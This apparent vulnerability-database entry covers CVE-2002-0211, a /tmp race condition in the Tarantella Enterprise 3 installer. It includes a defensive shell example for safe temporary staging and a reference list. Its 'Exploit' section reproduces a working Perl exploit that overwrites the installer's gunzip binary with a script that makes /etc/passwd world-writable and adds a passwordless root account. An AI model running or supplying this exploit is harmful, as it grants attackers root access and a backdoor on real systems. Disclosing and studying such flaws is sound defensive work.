Tarantella Enterprise 3 gunzip Race Condition Vulnerability

Vulnerability ID: 1106610  Vulnerability type: Race condition
Published: 2002-02-08  Updated: 2005-10-12
CVE ID: CVE-2002-0211  CNNVD-ID: CNNVD-200205-031
Platform: Unix  CVSS score: 6.2
|Vulnerability Source
https://www.exploit-db.com/exploits/21244
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200205-031
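|Vulnerability Details
Tarantella Enterprise 3 is web-based software for centralized control of IT application environments. A race condition in the Tarantella Enterprise installation process allows a local attacker to gain root privileges on the host. During installation, the program creates a gunzip binary in the temporary directory specified by the $TMPDIR environment variable (usually /tmp). The file is typically named gunzip$$, where $$ is the process ID, and the installer later runs this gunzip program as root. The gunzip program is world-readable and world-writable when it is created, so if it can be replaced with another executable before it is used, arbitrary commands may be executed as root. This vulnerability can only be exploited while the software is being installed.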
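The installer-side fix for the pattern described above, as an added example that is not code from the Tarantella installer or from this advisory: the helper is staged in a private, unpredictably named directory and checked before a privileged script runs it. The function names (`perms_ok`, `stage_helper`, `safe_to_exec`) and the `inst.` directory prefix are hypothetical.

```shell
#!/bin/sh
# Added example; stage_helper and safe_to_exec are hypothetical names,
# not functions from the Tarantella installer.

# perms_ok PATH: succeed only if PATH is owned by the current user and is
# not writable by group or others (POSIX find tests, no GNU extensions).
perms_ok() {
    [ -n "$(find "$1" -prune -user "$(id -u)" -print 2>/dev/null)" ] || return 1
    [ -z "$(find "$1" -prune \( -perm -020 -o -perm -002 \) -print 2>/dev/null)" ]
}

# stage_helper SRC: copy SRC into a fresh mode-0700 directory with an
# unpredictable name and print the staged path. Replaces the pattern of
# writing $TMPDIR/gunzip$$ with open permissions.
stage_helper() {
    src=$1
    old_umask=$(umask)
    umask 077    # nothing created below is accessible to group/others
    dir=$(mktemp -d "${TMPDIR:-/tmp}/inst.XXXXXXXXXX")
    rc=$?
    if [ "$rc" -eq 0 ]; then
        cp "$src" "$dir/gunzip" && chmod 700 "$dir/gunzip"
        rc=$?
    fi
    umask "$old_umask"
    [ "$rc" -eq 0 ] || return 1
    printf '%s\n' "$dir/gunzip"
}

# safe_to_exec PATH: pre-execution check a privileged script can run.
# Requires a regular file that is not a symlink, with both the file and
# its directory passing perms_ok, so no other user can replace the file
# between this check and its use.
safe_to_exec() {
    f=$1
    [ -f "$f" ] && [ ! -L "$f" ] || return 1
    perms_ok "$f" || return 1
    perms_ok "$(dirname "$f")"
}
```

The directory check is what closes the race: a file with tight permissions can still be swapped if another user can write to the directory that holds it.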
|Exploit
source: http://www.securityfocus.com/bid/3966/info

Tarantella Enterprise 3 is vulnerable to a race condition during the installation process. During installation, a root owned binary is created in /tmp (the directory specified by the $TMPDIR environment variable) with the name gunzip#### where #### is a PID. Prior to it being invoked by the installation program it can be overwritten by a local user. This is then run by the installation program with root privileges.

An attacker can only gain privileges in this manner if a privileged user is installing the software.

#!/usr/bin/perl -w
#Another Exploit for tarantella enterprise 3 installation.
#Larry Cashdollar lwc@vapid.dhs.org 2/08/2002
#Exploits gunzip$$ binary being created in /tmp with perm 777
#http://online.securityfocus.com/bid/3966
#Experimental ext3 kernel mods for preventing/researching race conditions.
#http://vapid.dhs.org/tmp-patch-kernel-2.4.17.html

use strict;

`cat  <<  -EOF- > root.sh
#!/bin/sh
chmod 777 /etc/passwd
echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd
-EOF-`;

my $OUT = '';

while(!$OUT) {
	$OUT =  `ps -ax |grep gunzip |grep -v grep`;
        print "Found $OUT\n";
}

my @args  = split(' ',$OUT);
# Do this with one copy operation. This will break installation of tarantella.
# should test for -w on /etc/passwd stop and su - tarexp.
while(1) {
`cp root.sh $args[4]`;
}
|References

Source: www.tarantella.com
Link: http://www.tarantella.com/security/bulletin-04.html
Source: XF
Name: tarantella-gunzip-tmp-race (7996)
Link: http://www.iss.net/security_center/static/7996.php
Source: BUGTRAQ
Name: 20020404 Exploit for Tarantella Enterprise 3 installation (BID 3966)
Link: http://online.securityfocus.com/archive/1/265845
Source: BUGTRAQ
Name: 20020126 Vulnerability report for Tarantella Enterprise 3.
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=101208650722179&w=2
Source: BID
Name: 3966
Link: http://www.securityfocus.com/bid/3966